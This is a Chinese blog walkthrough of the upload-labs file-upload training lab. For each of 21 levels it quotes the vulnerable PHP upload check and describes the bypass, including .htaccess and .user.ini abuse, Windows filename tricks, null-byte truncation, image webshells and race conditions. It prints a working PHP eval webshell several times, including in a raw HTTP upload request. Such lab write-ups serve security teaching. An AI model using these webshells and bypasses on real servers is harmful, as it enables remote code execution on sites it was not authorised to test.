zoukankan      html  css  js  c++  java
  • upload-labs 闯关记录

    项目地址:upload-labs,github 上的的跟 docker pull 下来的不一样,docker 里面没有新的第五关,建议下载下来自己捣鼓

    一句话:

    <?php @eval($_REQUEST['r0oki3']);phpinfo(); ?>  //方便直接验证是否上传成功
    

    第1关:

    • 限制:前端 JS
    • 关键代码:
    function checkFile() {
        ···········
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name + "|") == -1) {
            var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
            alert(errMsg);
            return false;
        }
    }
    
    • 解决办法:
      • 1.使前端 js 失效

      • 2.上传图片后缀的shell,抓包后更改后缀





    第2关:

    • 限制:后端 mime 类型限制
    • 关键代码:
    if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
                if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
                }
    }
    
    • 解决的办法:
      • 修改 Content-Type 值为 image/jpeg 、image/png、image/gif




    第3关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array('.asp','.aspx','.php','.jsp');
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //收尾去空
    
            if(!in_array($file_ext, $deny_ext)) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
                if (move_uploaded_file($temp_file,$img_path)) {
                     $is_upload = true;
                } else {
                    $msg = '上传出错!';
                }
            } else {
                $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
            }
    
    • 解决的办法:
      • 绕过黑名单上传

        注意点:如果上传的是 .php5 这种类型文件的话,如果想要被当成 php 执行的话,需要有个前提条件,即 Apache 的 httpd.conf 文件中有 AddType application/x-httpd-php .php .phtml .phps .php5 .pht




    第4关:

    • 限制:文件后缀黑名单
    • 关键代码:
    $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //收尾去空
        
    

    .htaccess 文件内容为:

    AddType application/x-httpd-php .jpg
    

    先上传一个 .htaccess 文件,然后上传一个文件后缀为 .jpg 的 shell 即可





    第5关:

    • 限制:文件后缀黑名单
    • 关键代码:
        if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //首尾去空
    }
    // 提示:上传目录存在 php 文件
    
    • 解决的办法:
      • 利用 .user.ini
        .user.ini 文件内容为:
    auto_prepend_file=shell.jpg
    

    先上传一个 .user.ini 文件,然后上传一个名为 shell.jpg 的 shell 即可





    第6关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //首尾去空
    }
    //可以看到,相较于第4、5题,第6题对 .htaccess、.ini 文件进行了过滤,不过少了一句 $file_ext = strtolower($file_ext); //转换为小写,因此可以利用大小写绕过
    
    • 解决的办法:
      • 大小写绕过




    第7关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
            $file_name = $_FILES['upload_file']['name'];
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
    }
    // 相较于第6题,少了这一句: $file_ext = trim($file_ext); //首尾去空
    
    • 解决的办法:
      • 文件末尾加空格

        注:Windows特性:对于 . 或者空格结尾的文件,windows会自动去除 . 和空格




    第8关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //首尾去空
    }
    // 相较于第7题,少了这一句: $file_name = deldot($file_name);//删除文件名末尾的点
    
    • 解决的办法:
      • 利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过




    第9关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写
            $file_ext = trim($file_ext); //首尾去空
    }
    // 相较于第8题,少了这一句: $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
    
    • 解决的办法:
      • 利用 Windows 特性,可在后缀名中加"::$DATA"绕过

        访问shell时要将 ::data 后缀去掉,如当文件存储在 upload-labs/upload/202006241411569530.php::$data 时,访问时应为 upload-labs/upload/202006241411569530.php,无 ::data 后缀
        注:Windows下,如果文件名为"shell.php::$DATA"时,::$DATA 之后的数据当成文件流处理,不会检测后缀名,而保持 ::$DATA 之前的文件名,即 shell.php




    第10关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = deldot($file_name);//删除文件名末尾的点                       
            $file_ext = strrchr($file_name, '.');
            $file_ext = strtolower($file_ext); //转换为小写      
            $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
            $file_ext = trim($file_ext); //首尾去空
            if (!in_array($file_ext, $deny_ext)) {
             $temp_file = $_FILES['upload_file']['tmp_name'];
             $img_path = UPLOAD_PATH.'/'.$file_name;
             if (move_uploaded_file($temp_file, $img_path)) {
                 $is_upload = true;
             } else {
                 $msg = '上传出错!';
                 }
            } else {
                $msg = '此文件类型不允许上传!';
                }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
        }
    // 这下好了,什么都加了,不过可以看到在命名文件的时候没有使用随机字符串
    
    • 解决的办法:
      • 构造特殊文件名 shell.php. .

        注:说到底还是利用了Windows特性:对于 . 或者空格结尾的文件,windows会自动去除 . 和空格




    第11关:

    • 限制:文件后缀黑名单
    • 关键代码:
    if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
    
            $file_name = trim($_FILES['upload_file']['name']);
            $file_name = str_ireplace($deny_ext,"", $file_name);  //大小写不敏感
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;  
    }
    
    • 解决的办法:
      • 穿插绕过




    第12关:

    • 限制:文件后缀白名单
    • 关键代码:
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;  //这里文件路径采用拼接方式,其中 $_GET['save_path'] 用户可控
    
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        }
    
    • 解决的办法:
      • %00 截断,生成的 shell 名为 shell.php

    注:截断条件:php 版本小于5.3.4,php 的 magic_quotes_gpc 为 OFF 状态




    第13关:

    • 限制:文件后缀白名单
    • 关键代码:
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        if(in_array($file_ext,$ext_arr)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
    
            if(move_uploaded_file($temp_file,$img_path)){
                $is_upload = true;
            } 
    }
    
    • 解决的办法:
      • 00 截断

    注:save_path 参数通过 POST 方式传递,还是利用 00 截断,但因为 POST 不会像 GET 对 %00 进行自动解码,所以需要在二进制中进行修改





    第14关:

    • 限制:验证文件头
    • 关键代码:
    function getReailFileType($filename){
        $file = fopen($filename, "rb");
        $bin = fread($file, 2); //只读2字节
        fclose($file);
        $strInfo = @unpack("C2chars", $bin);    
        $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
        $fileType = '';    
        switch($typeCode){      
            case 255216:            
                $fileType = 'jpg';
                break;
            case 13780:            
                $fileType = 'png';
                break;        
            case 7173:            
                $fileType = 'gif';
                break;
            default:            
                $fileType = 'unknown';
            }    
            return $fileType;
    }
    
    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_type = getReailFileType($temp_file);
    }
    
    • 解决的办法:
      • 图片马绕过加文件包含漏洞 getshell
        shell.php
    GIF89a? <script language="php">phpinfo();eval($_REQUEST['r0oki3']);</script>
    

    将后缀改成 .gif 上传即可





    第15关:

    • 限制:getimagesize() 函数验证图片格式
    • 关键代码:
    function isImage($filename){
        $types = '.jpeg|.png|.gif';
        if(file_exists($filename)){
            $info = getimagesize($filename);
            $ext = image_type_to_extension($info[2]);
            if(stripos($types,$ext)>=0){
                return $ext;
            }else{
                return false;
            }
        }else{
            return false;
        }
    }
    
    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $res = isImage($temp_file);
    
    ············
    
    }
    
    • 解决的办法:
      • 1.同第14题
      • 2.图片马绕过加文件包含漏洞 getshell
        制作图片马:copy 1.png /b + shell.php /a ishell.jpg
        上传图片马,文件包含 getshell





    第16关:

    • 限制:exif_imagetype() 函数验证图片格式
    • 关键掉代码:
    function isImage($filename){
        //需要开启php_exif模块
        $image_type = exif_imagetype($filename);
        switch ($image_type) {
            case IMAGETYPE_GIF:
                return "gif";
                break;
            case IMAGETYPE_JPEG:
                return "jpg";
                break;
            case IMAGETYPE_PNG:
                return "png";
                break;    
            default:
                return false;
                break;
        }
    }
    
    $is_upload = false;
    $msg = null;
    if(isset($_POST['submit'])){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $res = isImage($temp_file);
    
    ··········
    }
    
    • 解决的办法:
      • 同 第15题的1、2解决方案都可




    第17关:

    • 限制:imagecreatefromjpeg() 函数二次渲染
    • 关键代码:
    if (isset($_POST['submit'])){
        // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
        $filename = $_FILES['upload_file']['name'];
        $filetype = $_FILES['upload_file']['type'];
        $tmpname = $_FILES['upload_file']['tmp_name'];
    
        $target_path=UPLOAD_PATH.'/'.basename($filename);
    
        // 获得上传文件的扩展名
        $fileext= substr(strrchr($filename,"."),1);
    
        //判断文件后缀与类型,合法才进行上传操作
        if(($fileext == "jpg") && ($filetype=="image/jpeg")){
            if(move_uploaded_file($tmpname,$target_path)){
                //使用上传的图片生成新的图片
                $im = imagecreatefromjpeg($target_path);
    
                if($im == false){
                    $msg = "该文件不是jpg格式的图片!";
                    @unlink($target_path);
                }else{
                    //给新图片指定文件名
                    srand(time());
                    $newfilename = strval(rand()).".jpg";
                    //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                    $img_path = UPLOAD_PATH.'/'.$newfilename;
                    imagejpeg($im,$img_path);
                    @unlink($target_path);
                    $is_upload = true;
                }
            } else {
                $msg = "上传出错!";
            }
    



    第18关:

    • 限制:文件后缀白名单
    • 关键代码:
    if(isset($_POST['submit'])){
        $ext_arr = array('jpg','png','gif');
        $file_name = $_FILES['upload_file']['name'];
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_ext = substr($file_name,strrpos($file_name,".")+1);
        $upload_file = UPLOAD_PATH . '/' . $file_name;
    
        if(move_uploaded_file($temp_file, $upload_file)){            //这里可以看到文件是先存然后再判断后缀的,而且是没有改名字就存储的,所以可以利用条件竞争,在文件被删除前访问
            if(in_array($file_ext,$ext_arr)){
                 $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
                 rename($upload_file, $img_path);
                 $is_upload = true;
            }else{
                $msg = "只允许上传.jpg|.png|.gif类型文件!";
                unlink($upload_file);
            }
    }
    
    • 解决的办法:
      • 条件竞争
        首先用 burp intruder 快速发包

    然后再浏览器里不断访问该 shell

    * 上传图片马,再利用文件包含,同第19关
    

    具体请看下一题





    第19关:

    • 限制:文件后缀白名单
    • 关键代码:
    $is_upload = false;
    $msg = null;
    if (isset($_POST['submit']))
    {
        require_once("./myupload.php");
        $imgFileName =time();
        $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
        $status_code = $u->upload(UPLOAD_PATH);
        switch ($status_code) {
            case 1:
                $is_upload = true;
                $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
                break;
            case 2:
                $msg = '文件已经被上传,但没有重命名。';
                break; 
            case -1:
                $msg = '这个文件不能上传到服务器的临时文件存储目录。';
                break; 
            case -2:
                $msg = '上传失败,上传目录不可写。';
                break; 
            case -3:
                $msg = '上传失败,无法上传该类型文件。';
                break; 
            case -4:
                $msg = '上传失败,上传的文件过大。';
                break; 
            case -5:
                $msg = '上传失败,服务器已经存在相同名称文件。';
                break; 
            case -6:
                $msg = '文件无法上传,文件不能复制到目标目录。';
                break;      
            default:
                $msg = '未知错误!';
                break;
        }
    }
    
    //myupload.php
    class MyUpload{
    ......
    ......
    ...... 
      var $cls_arr_ext_accepted = array(
          ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
          ".html", ".xml", ".tiff", ".jpeg", ".png" );
    
    ......
    ......
    ......  
      /** upload()
       **
       ** Method to upload the file.
       ** This is the only method to call outside the class.
       ** @para String name of directory we upload to
       ** @returns void
      **/
      function upload( $dir ){
        
        $ret = $this->isUploadedFile();
        
        if( $ret != 1 ){
          return $this->resultUpload( $ret );
        }
    
        $ret = $this->setDir( $dir );
        if( $ret != 1 ){
          return $this->resultUpload( $ret );
        }
    
        $ret = $this->checkExtension();
        if( $ret != 1 ){
          return $this->resultUpload( $ret );
        }
    
        $ret = $this->checkSize();
        if( $ret != 1 ){
          return $this->resultUpload( $ret );    
        }
        
        // if flag to check if the file exists is set to 1
        
        if( $this->cls_file_exists == 1 ){
          
          $ret = $this->checkFileExists();
          if( $ret != 1 ){
            return $this->resultUpload( $ret );    
          }
        }
    
        // if we are here, we are ready to move the file to destination
    
        $ret = $this->move();
        if( $ret != 1 ){
          return $this->resultUpload( $ret );    
        }
    
        // check if we need to rename the file
    
        if( $this->cls_rename_file == 1 ){
          $ret = $this->renameFile();
          if( $ret != 1 ){
            return $this->resultUpload( $ret );    
          }
        }
        
        // if we are here, everything worked as planned :)
    
        return $this->resultUpload( "SUCCESS" );
      
      }
    ......
    ......
    ...... 
    };
    
    • 解决的办法:
      • 上传图片马,然后利用文件包含

    返回包:

    包含:

    * 条件竞争
    

    burp 不断发送图片马
    由于条件竞争文件来不及重命名:

    利用文件包含:

    注:对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等,将文件上传后,对文件重新命名,同样存在条件竞争的漏洞。可以不断利用burp发送上传图片马的数据包,由于条件竞争,程序会出现来不及rename的问题,从而上传成功





    第20关:

    • 限制:文件后缀白名单
    • 关键代码:
    if (isset($_POST['submit'])) {
        if (file_exists(UPLOAD_PATH)) {
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
    
            $file_name = $_POST['save_name'];            //这个参数用户可控,自定义文件名
            $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
    
            if(!in_array($file_ext,$deny_ext)) {
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' .$file_name;
                if (move_uploaded_file($temp_file, $img_path)) { 
                    $is_upload = true;
                }else{
                    $msg = '上传出错!';
                }
            }
    
    • 解决的办法:
      • /. 绕过或者 . 绕过
        原理:move_uploaded_file() 函数会忽略掉文件末尾的 /.

        访问:

      • 00 截断

    修改hex:

    访问:

    第21关:

    • 限制:文件后缀白名单
    • 关键代码:
    if(!empty($_FILES['upload_file'])){
        //检查MIME
        $allow_type = array('image/jpeg','image/png','image/gif');
        if(!in_array($_FILES['upload_file']['type'],$allow_type)){
            $msg = "禁止上传该类型文件!";
        }else{
            //检查文件名
            $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
            if (!is_array($file)) {
                $file = explode('.', strtolower($file));
            }
    
            $ext = end($file);
            $allow_suffix = array('jpg','png','gif');
            if (!in_array($ext, $allow_suffix)) {
                $msg = "禁止上传该后缀文件!";
            }else{
                $file_name = reset($file) . '.' . $file[count($file) - 1];
                $temp_file = $_FILES['upload_file']['tmp_name'];
                $img_path = UPLOAD_PATH . '/' .$file_name;
                if (move_uploaded_file($temp_file, $img_path)) {
                    $msg = "文件上传成功!";
                    $is_upload = true;
                } else {
                    $msg = "文件上传失败!";
                }
            }
        }
    }
    
    • 解决的办法:
      • 数组绕过
        参考:

    文件命名规则:$file_name = reset($file) . '.' . $file[count($file) - 1];
    reset():将内部指针指向数组中的第一个元素,并输出。
    end():将内部指针指向数组中的最后一个元素,并输出。
    $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];如果save_name不为空则file为save_name,否则file为filename
    if (!is_array($file))判断如果file不是数组则以'.'分组
    文件名命名规则$file_name = reset($file) . '.' . $file[count($file) - 1];
    我们POST传入一个save_name列表:['info20.php', '', 'jpg'],此时empty($_POST['save_name']) 为假则file为save_name,所以由$ext = end($file);为jpg可以通过后缀名判断(判断结束后最后一个元素jpg弹出),并且最终文件名组装为upload20.php.

    第一步:

    POST /upload-labs/Pass-21/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: multipart/form-data; boundary=---------------------------95598183919059804224251915399
    Content-Length: 639
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/upload-labs/Pass-21/index.php
    Upgrade-Insecure-Requests: 1
    
    -----------------------------95598183919059804224251915399
    Content-Disposition: form-data; name="upload_file"; filename="shell.php"
    Content-Type: image/jpeg
    
    <?php @eval($_REQUEST['r0oki3']);phpinfo(); ?>
    -----------------------------95598183919059804224251915399
    Content-Disposition: form-data; name="save_name[0]"
    
    upload-20.php
    -----------------------------95598183919059804224251915399
    Content-Disposition: form-data; name="save_name[2]"
    
    jpg
    -----------------------------95598183919059804224251915399
    Content-Disposition: form-data; name="submit"
    
    上传
    -----------------------------95598183919059804224251915399--
    
    

    第二步:

    * 图片马,然后文件包含
  • 相关阅读:
    Oracle的function存储函数简单实例
    Java保留小数点后两位,解决精度丢失问题
    天津贷款买房提取公积金相关问题
    Springboot配置连接两个数据库
    JDK8:Lambda根据 单个字段、多个字段,分组求和
    原生Ajax方式请求后端导出Excel,在浏览器页面显示下载Excel表(前端请求带header)
    Java实现 微信小程序 + 消息推送
    Centos7安装docker
    将博客搬至CSDN
    读书笔记——数学之美
  • 原文地址:https://www.cnblogs.com/wjrblogs/p/13181839.html
Copyright © 2011-2022 走看看